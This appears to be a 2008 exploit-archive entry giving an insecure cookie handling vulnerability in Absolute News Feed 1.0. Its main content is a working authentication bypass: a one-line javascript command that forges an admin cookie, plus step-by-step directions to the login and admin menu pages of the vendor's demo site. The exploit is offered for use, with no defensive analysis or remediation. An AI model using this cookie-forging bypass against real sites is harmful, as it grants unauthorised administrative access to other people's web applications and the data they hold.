[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability
# Published : 2008-10-31
# Author : Hakxer
# Previous Title : Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability
# Next Title : Absolute FAQ Manager 6.0 Insecure Cookie Handling Vulnerability
########################################################################
# Discovered by : Hakxer #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com #
# ------------------------------- #
# Poc : #
# javascript:document.cookie="xlaAFSuser=p=admin"; #
# #
# [~] Exploit #
# #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin"; #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx #
# #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability ) #
########################################################################
# www.Syue.com [2008-10-31]